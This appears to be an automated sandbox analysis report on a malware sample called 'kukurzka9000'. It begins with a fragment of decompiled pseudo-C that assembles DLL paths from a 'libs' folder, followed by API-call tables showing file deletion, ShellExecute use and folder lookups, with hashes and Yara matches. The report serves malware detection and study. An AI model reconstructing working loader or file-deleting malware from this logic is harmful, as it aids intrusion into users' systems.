                                                                                                                                                                        						_t8 =  &_v8; // 0x4079e3
                                                                                                                                                                        						if(E0040A3E4(_t115, _t8, 0, _t63) != 1) {
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
                                                                                                                                                                        						_v20 = _t73;
                                                                                                                                                                        						if(_t73 == 0) {
                                                                                                                                                                        							_t74 = _v12;
                                                                                                                                                                        							if(_t74 != 0) {
                                                                                                                                                                        								LocalFree(_t74);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_t150 != 0) {
                                                                                                                                                                        								LocalFree(_t150);
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L25;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t126 =  *0x40e114; // 0x74656920
                                                                                                                                                                        						_push(L"libs");
                                                                                                                                                                        						_t10 =  &_v8; // 0x4079e3
                                                                                                                                                                        						_push( *_t10);
                                                                                                                                                                        						if( *_t126() != 0) {
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t115 = _t115 + _v28 * 2 + 2;
                                                                                                                                                                        						_t81 = _v20 - _t115;
                                                                                                                                                                        						_v20 = _t81 >> 1;
                                                                                                                                                                        						if(_t81 == 0) {
                                                                                                                                                                        							L33:
                                                                                                                                                                        							_t83 = _v12;
                                                                                                                                                                        							if(_t83 != 0) {
                                                                                                                                                                        								LocalFree(_t83);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v8 == 0) {
                                                                                                                                                                        								L38:
                                                                                                                                                                        								if(_t150 != 0) {
                                                                                                                                                                        									LocalFree(_t150);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_t152 != 0) {
                                                                                                                                                                        									LocalFree(_t152);
                                                                                                                                                                        								}
                                                                                                                                                                        								return 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								L37:
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
                                                                                                                                                                        						if(_t90 == 0) {
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t91 = _t90 - _t115;
                                                                                                                                                                        						_t92 = _t91 >> 1;
                                                                                                                                                                        						_v28 = _t91 >> 1;
                                                                                                                                                                        						if(_t91 == 0) {
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
                                                                                                                                                                        							L16:
                                                                                                                                                                        							_t150 = _v16;
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
                                                                                                                                                                        							_t152 = _v24;
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
                                                                                                                                                                        						_t146 =  *0x40e258; // 0x658558
                                                                                                                                                                        						_t101 = E0040A503(_t100, _t146);
                                                                                                                                                                        						_t150 = _v16;
                                                                                                                                                                        						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
                                                                                                                                                                        						_t137 =  *0x40e374; // 0x6295b0
                                                                                                                                                                        						_v28 = _t137;
                                                                                                                                                                        						_v20 = _t103;
                                                                                                                                                                        						_t104 = E00408619( &_v28);
                                                                                                                                                                        						_t152 = _v24;
                                                                                                                                                                        						_v28 = _t104;
                                                                                                                                                                        						E00408495(_t152, _t104, _t103);
                                                                                                                                                                        						_t106 = _v28;
                                                                                                                                                                        						if(_t106 != 0) {
                                                                                                                                                                        							LocalFree(_t106);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t107 = _v20;
                                                                                                                                                                        						if(_t107 != 0) {
                                                                                                                                                                        							LocalFree(_t107);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t111 = _t122 - _t115;
                                                                                                                                                                        					_t63 = _t111 >> 1;
                                                                                                                                                                        					_v28 = _t111 >> 1;
                                                                                                                                                                        					if(_t111 < 0) {
                                                                                                                                                                        						_t112 = _v12;
                                                                                                                                                                        						if(_t112 != 0) {
                                                                                                                                                                        							LocalFree(_t112);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t37 =  &_v8; // 0x4079e3
                                                                                                                                                                        						_t113 =  *_t37;
                                                                                                                                                                        						if(_t113 == 0) {
                                                                                                                                                                        							goto L38;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							LocalFree(_t113);
                                                                                                                                                                        							goto L37;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t150 != 0) {
                                                                                                                                                                        						LocalFree(_t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						LocalFree(_t152);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
                                                                                                                                                                        					_t115 = _t34;
                                                                                                                                                                        					_push(_t115);
                                                                                                                                                                        				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
                                                                                                                                                                        				_t152 = _v12;
                                                                                                                                                                        				goto L25;
                                                                                                                                                                        			}


































                                                                                                                                                                        0x0040865f
                                                                                                                                                                        0x00408663
                                                                                                                                                                        0x00408675
                                                                                                                                                                        0x00408677
                                                                                                                                                                        0x00408678
                                                                                                                                                                        0x00408680
                                                                                                                                                                        0x00408888
                                                                                                                                                                        0x0040888a
                                                                                                                                                                        0x0040888d
                                                                                                                                                                        0x0040888d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408686
                                                                                                                                                                        0x00408686
                                                                                                                                                                        0x00408699
                                                                                                                                                                        0x004086a8
                                                                                                                                                                        0x004086ba
                                                                                                                                                                        0x004086c3
                                                                                                                                                                        0x004086cd
                                                                                                                                                                        0x004086db
                                                                                                                                                                        0x004086de
                                                                                                                                                                        0x004086e3
                                                                                                                                                                        0x004086e5
                                                                                                                                                                        0x004086e7
                                                                                                                                                                        0x004086ec
                                                                                                                                                                        0x004086fd
                                                                                                                                                                        0x00408700
                                                                                                                                                                        0x0040870f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408721
                                                                                                                                                                        0x00408723
                                                                                                                                                                        0x00408728
                                                                                                                                                                        0x004088ea
                                                                                                                                                                        0x004088ef
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088fc
                                                                                                                                                                        0x00408901
                                                                                                                                                                        0x00408901
                                                                                                                                                                        0x00408909
                                                                                                                                                                        0x00408910
                                                                                                                                                                        0x00408910
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408909
                                                                                                                                                                        0x0040872e
                                                                                                                                                                        0x00408734
                                                                                                                                                                        0x00408739
                                                                                                                                                                        0x00408739
                                                                                                                                                                        0x00408740
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040874f
                                                                                                                                                                        0x00408752
                                                                                                                                                                        0x00408756
                                                                                                                                                                        0x00408759
                                                                                                                                                                        0x004088b3
                                                                                                                                                                        0x004088b3
                                                                                                                                                                        0x004088b8
                                                                                                                                                                        0x004088bb
                                                                                                                                                                        0x004088bb
                                                                                                                                                                        0x004088c5
                                                                                                                                                                        0x004088d0
                                                                                                                                                                        0x004088d2
                                                                                                                                                                        0x004088d5
                                                                                                                                                                        0x004088d5
                                                                                                                                                                        0x004088dd
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088c7
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088c5
                                                                                                                                                                        0x0040876b
                                                                                                                                                                        0x0040876f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408775
                                                                                                                                                                        0x00408777
                                                                                                                                                                        0x00408779
                                                                                                                                                                        0x0040877c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408793
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x004087b0
                                                                                                                                                                        0x00408838
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408838
                                                                                                                                                                        0x004087c9
                                                                                                                                                                        0x004087ce
                                                                                                                                                                        0x004087d6
                                                                                                                                                                        0x004087db
                                                                                                                                                                        0x004087ee
                                                                                                                                                                        0x004087f3
                                                                                                                                                                        0x004087fb
                                                                                                                                                                        0x00408801
                                                                                                                                                                        0x00408804
                                                                                                                                                                        0x0040880a
                                                                                                                                                                        0x00408811
                                                                                                                                                                        0x00408814
                                                                                                                                                                        0x00408819
                                                                                                                                                                        0x0040881f
                                                                                                                                                                        0x00408822
                                                                                                                                                                        0x00408822
                                                                                                                                                                        0x00408828
                                                                                                                                                                        0x0040882d
                                                                                                                                                                        0x00408830
                                                                                                                                                                        0x00408830
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040882d
                                                                                                                                                                        0x004086f0
                                                                                                                                                                        0x004086f2
                                                                                                                                                                        0x004086f4
                                                                                                                                                                        0x004086f7
                                                                                                                                                                        0x0040889b
                                                                                                                                                                        0x004088a0
                                                                                                                                                                        0x004088a3
                                                                                                                                                                        0x004088a3
                                                                                                                                                                        0x004088a9
                                                                                                                                                                        0x004088a9
                                                                                                                                                                        0x004088ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088b0
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040883e
                                                                                                                                                                        0x00408842
                                                                                                                                                                        0x00408847
                                                                                                                                                                        0x00408847
                                                                                                                                                                        0x0040884f
                                                                                                                                                                        0x00408852
                                                                                                                                                                        0x00408852
                                                                                                                                                                        0x0040885a
                                                                                                                                                                        0x0040885d
                                                                                                                                                                        0x0040885d
                                                                                                                                                                        0x00408871
                                                                                                                                                                        0x00408871
                                                                                                                                                                        0x00408879
                                                                                                                                                                        0x0040887c
                                                                                                                                                                        0x00408885
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408847
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408852
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040885D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408901
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408910
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc
                                                                                                                                                                        • String ID: iet$.dll$libs$pXet$y@$y@
                                                                                                                                                                        • API String ID: 3098330729-2679039284
                                                                                                                                                                        • Opcode ID: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
                                                                                                                                                                        • Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
                                                                                                                                                                        • Opcode Fuzzy Hash: 256491809de4a65429cad93a6271d82b62e2b5fb655f29cdfe79702446f82b76
                                                                                                                                                                        • Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0239A882
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A961
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A96C
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A976
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A97D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A984
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0239A98F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0239A996
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A9F7
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A9FE
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239AA08
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239AA0F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239AA18
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239AA1F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0239AA26
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239AA4D
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0239AA54
                                                                                                                                                                          • Part of subcall function 02399C82: LocalFree.KERNEL32(?), ref: 02399D36
                                                                                                                                                                          • Part of subcall function 0239A6EB: LocalFree.KERNEL32(00000000), ref: 0239A7D1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$File$CloseDelete$FindHandleSize
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 948424528-4267161970
                                                                                                                                                                        • Opcode ID: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
                                                                                                                                                                        • Instruction ID: 8a2fdb141719fd8df11796ced1af110e850ef37fd7fa68bf920a345b1b894ea7
                                                                                                                                                                        • Opcode Fuzzy Hash: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
                                                                                                                                                                        • Instruction Fuzzy Hash: 20A19371204301AFDB14DF65DE88E6B77E9EB89704F004928FA55A72A0DB74DC11CF6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023922BB
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,?), ref: 023922FB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392306
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392315
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392324
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392333
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239233E
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 023924A4
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 023924AB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 023924C3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239273F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02392748
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392756
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02392760
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 02392797
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: FALSE$TRUE$pXet$xd
                                                                                                                                                                        • API String ID: 2194112602-1318116738
                                                                                                                                                                        • Opcode ID: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
                                                                                                                                                                        • Instruction ID: f79560788e2075e9fed640a156687d448e154d33d6d1b57e56741ac21e0030bf
                                                                                                                                                                        • Opcode Fuzzy Hash: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
                                                                                                                                                                        • Instruction Fuzzy Hash: 43027F71900219EFDF159FA2EE89AAEBBB5FF09300F104825F911B72A0D7759920DF58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396CD6
                                                                                                                                                                          • Part of subcall function 02399958: LocalFree.KERNEL32(00000000,?,023932BA,00000002,?), ref: 023999BD
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02396BE7
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396BF0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396BF7
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396BFE
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C07
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,0040D968,?,?,00000000,00000000), ref: 02396C37
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C41
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C4A
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C51
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C5A
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C82
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C8B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C92
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396C9B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396CA9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396CB8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396CC1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$ExecuteShell$Global
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3422199401-1731603023
                                                                                                                                                                        • Opcode ID: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
                                                                                                                                                                        • Instruction ID: 144528b1351d7580a93055f2317d281696cb8bc078f26feecf06c2f0e6c0a263
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 04A1E972A01225AFDF149BA6DE45DBEB7B9EF45300B004828F905F7260DB74AD11CFA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399958: LocalFree.KERNEL32(00000000,?,023932BA,00000002,?), ref: 023999BD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0A0
                                                                                                                                                                          • Part of subcall function 0239A6EB: LocalFree.KERNEL32(00000000), ref: 0239A7D1
                                                                                                                                                                          • Part of subcall function 0239A6EB: LocalFree.KERNEL32(?), ref: 0239AA4D
                                                                                                                                                                          • Part of subcall function 0239A6EB: FindClose.KERNEL32(00000000), ref: 0239AA54
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A099
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A06F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A078
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A081
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0239A08A
                                                                                                                                                                        • LocalFree.KERNEL32(02397111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0A9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0B2
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0BB
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0C4
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0CD
                                                                                                                                                                        • LocalFree.KERNEL32(02397111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0F4
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A0FD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A106
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A10F
                                                                                                                                                                        • LocalFree.KERNEL32(02397111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A11D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A126
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A12F
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A138
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02397111), ref: 0239A13F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$CloseFindGlobal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1000408776-1731603023
                                                                                                                                                                        • Opcode ID: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
                                                                                                                                                                        • Instruction ID: a19a369489937a349c6b1eae9d9c204ce2a7636baad51d1a67a9bc98ba4b15b2
                                                                                                                                                                        • Opcode Fuzzy Hash: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
                                                                                                                                                                        • Instruction Fuzzy Hash: BDC19772900215AFEF089FA6DE49EAE7BB9EF48310F044529F905B73A0DB745D10CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
                                                                                                                                                                        • Instruction ID: 8121e23d3c97cdf60cecf77723605a95baa142e76cbdd4b3990d9bab16c01432
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
                                                                                                                                                                        • Instruction Fuzzy Hash: C4A1C472A00115BFEF019BAADE45FAE7BB9EB49310F104528F615F72A0DB706D108B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 0-1731603023
                                                                                                                                                                        • Opcode ID: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
                                                                                                                                                                        • Instruction ID: a78aac39db866f532d7d9cd26780e5c5ef2055651675719b6ca73939ef4fec2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
                                                                                                                                                                        • Instruction Fuzzy Hash: CAA1C372A00115BFEF009BAADE45FAE7BB9EB49310F104524F615F72A0DBB06D11CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0239A3C2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A41D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A424
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$FolderPathSpecial
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1941890384-1731603023
